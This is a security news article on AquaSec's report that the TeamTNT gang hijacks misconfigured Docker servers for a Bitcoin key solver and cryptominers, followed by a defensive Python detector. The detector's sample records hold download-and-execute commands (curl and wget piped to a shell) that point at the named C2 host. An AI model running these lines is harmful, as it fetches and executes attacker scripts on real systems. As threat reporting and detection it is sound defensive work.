Cyber Crime

TeamTNT is back and targets servers to run Bitcoin encryption solvers

AquaSec researchers have observed the cybercrime gang TeamTNT hijacking servers to run a Bitcoin key solver since early September.

In the first week of September, AquaSec researchers identified at least three different attacks targeting their honeypots, which they attributed to the cybercrime gang TeamTNT.

The TeamTNT botnet is a crypto-mining malware operation that has been active since April 2020 and targets Docker installs. The activity of the TeamTNT group has been detailed by security firm Trend Micro, and in August 2020 experts from Cado Security discovered that the botnet is also able to target misconfigured Kubernetes installations.

In January 2021, the cybercrime gang launched a new campaign targeting Kubernetes environments with the Hildegard malware.

The discovery of the recent attacks is important because on November 6th, 2021, TeamTNT posted a farewell note on Twitter. Experts pointed out, however, that the group's infrastructure continued to automatically infect new victims with old worms that could scan and compromise new systems.

The new attacks suggest the hacking group is back in action.

The new TeamTNT attacks are aimed at hijacking servers to run a Bitcoin key solver. The experts tracked the activity as “the Kangaroo attack” because the threat actors were using Pollard’s Kangaroo WIF solver.

The attackers scan for misconfigured Docker daemons, deploy a vanilla Alpine image, deliver a script (“k.sh”), and fetch the solver from GitHub.

“What we discovered is that TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server (domain: whatwill[.]be on IP 93[.]95[.]229[.]203).” reads the analysis published by AquaSec. “The shell script is cloning a GitHub project from what seems to be a TeamTNT account. The project was a bit of a conundrum at first, specifying that this is a fork of “Pollard’s kangaroo for SECPK1”.”

Pollard’s Kangaroo is an interval ECDLP (elliptic-curve discrete logarithm problem) solver; its use here appears to be an attempt to recover private keys on the SECP256K1 curve, which Bitcoin uses for its public key cryptography. The TeamTNT group is using the computational power of the compromised targets to run the ECDLP solver.

The solver runs in a distributed fashion: the work is split into chunks that are handed out to the various nodes (the compromised servers), and the results are collected and written locally to a text file.

“Breaking the cryptographic encryption is considered “Mission: Impossible”. If you actually succeed doing that, you potentially have the keys to almost everything that is connected online, which could have a devastating effect on the entire internet.” the experts continue.

According to the experts, the hacking gang is likely experimenting with new attack techniques.

AquaSec researchers also observed the gang reusing attacks previously attributed to it, such as the Cronb Attack, now with new feature improvements.

The new variant of the “Cronb Attack” relies on new C2 infrastructure and new data exchange.

Experts also observed the “What Will Be” attack against their honeypots: the threat actor exploited a misconfigured Docker API to run the vanilla container image alpine with a malicious command designed to download and run the shell file dc.sh.

The attack aims at deploying a cryptominer on the target systems and performing SSH scans on the network.
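Both the Kangaroo attack and the “What Will Be” attack described above share one observable: a vanilla alpine container started through an exposed Docker API with a command that downloads and executes a shell script (k.sh or dc.sh) from the C2 host named in the AquaSec analysis. The detector below is an added example, not AquaSec's or TeamTNT's code; it assumes input records shaped like Docker's `inspect` output (`Config.Image`, `Config.Cmd`) and uses constructed sample records.

```python
"""Flag container records matching the alpine + download-and-run pattern above.

Assumed field layout follows Docker's container inspect JSON (Config.Image,
Config.Cmd). The indicators come from the AquaSec analysis quoted in the post.
"""
import json
import re

# Indicators quoted in the analysis (written defanged in the article).
C2_DOMAIN = "whatwill.be"
C2_IP = "93.95.229.203"
SCRIPT_NAMES = ("k.sh", "dc.sh")

# A download utility followed, anywhere later in the command, by a shell.
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\b(sh|bash)\b", re.S)


def flag_container(record: dict) -> list[str]:
    """Return the reasons a single container record looks like this pattern."""
    cfg = record.get("Config", {})
    image = cfg.get("Image", "")
    cmd = " ".join(cfg.get("Cmd") or [])
    reasons = []
    base_image = image.split(":")[0]
    if base_image in ("alpine", "docker.io/library/alpine") and DOWNLOAD_AND_RUN.search(cmd):
        reasons.append("vanilla alpine image with download-and-execute command")
    if C2_DOMAIN in cmd or C2_IP in cmd:
        reasons.append("known C2 host in command")
    if any(name in cmd for name in SCRIPT_NAMES):
        reasons.append("known dropper script name in command")
    return reasons


def scan(records_json: str) -> dict[str, list[str]]:
    """Map container id -> reasons for every flagged record in a JSON array."""
    return {r["Id"]: hits for r in json.loads(records_json) if (hits := flag_container(r))}


# Constructed sample records, not captured data.
SAMPLE = json.dumps([
    {"Id": "c1", "Config": {"Image": "alpine", "Cmd": ["sh", "-c", "curl -s http://whatwill.be/k.sh | sh"]}},
    {"Id": "c2", "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Id": "c3", "Config": {"Image": "alpine:3.18", "Cmd": ["/bin/sh", "-c", "wget -qO- http://93.95.229.203/dc.sh | bash"]}},
])

if __name__ == "__main__":
    for cid, why in scan(SAMPLE).items():
        print(cid, "->", "; ".join(why))
```

On a live host the same function can be fed the output of `docker inspect` for each running container; the hypothetical helper is deliberately kept independent of the Docker SDK so it runs offline.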

“TeamTNT was highly active between 2020 and 2021. They had used many tools and techniques in their campaigns and had launched them frequently. Some of these tools had been designed to escape from container environments, steal tokens and credentials, scan and attack local and external networks, hide activities with rootkits, and more.” concludes the report. “Now TeamTNT appears to be back with new tricks. We are still assessing if these three attacks are a sign that they have resumed their campaigns against cloud native environments or not.”


Pierluigi Paganini

(SecurityAffairs – hacking, cryptomining)
